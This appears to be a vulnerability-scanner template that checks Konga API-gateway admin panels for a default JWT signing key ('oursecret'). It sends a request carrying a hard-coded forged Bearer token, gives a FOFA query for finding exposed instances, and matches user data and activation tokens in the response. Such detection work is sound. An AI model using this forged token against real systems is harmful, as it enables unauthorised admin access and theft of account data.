http:
    - matchers:
        - status:
            - 200
          type: status
        - condition: and
          part: body
          type: word
          words:
            - '"createdUser":'
            - '"username":'
            - '"activationToken":'
      matchers-condition: and
      raw:
        - |
          GET /api/user HTTP/1.1
          Host: {{Hostname}}
          Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.MQ.gSssTBEVe6X9aFEd0H_tt8kk2u7df90W1eOzNRnrsQ4
id: konga-default-jwt-key
info:
    author: SleepingBag945
    description: |
        The default key of Konga JWT is oursecret, which can forge arbitrary user permissions
        FOFA: app="Konga-Api-Gateway"
    name: KONGA Arbitrary user login vulnerability
    reference:
        - https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg
        - https://github.com/pantsel/konga
    severity: high
    tags:
        - kong
        - jwt
        - default
        - Kong
        - Konga
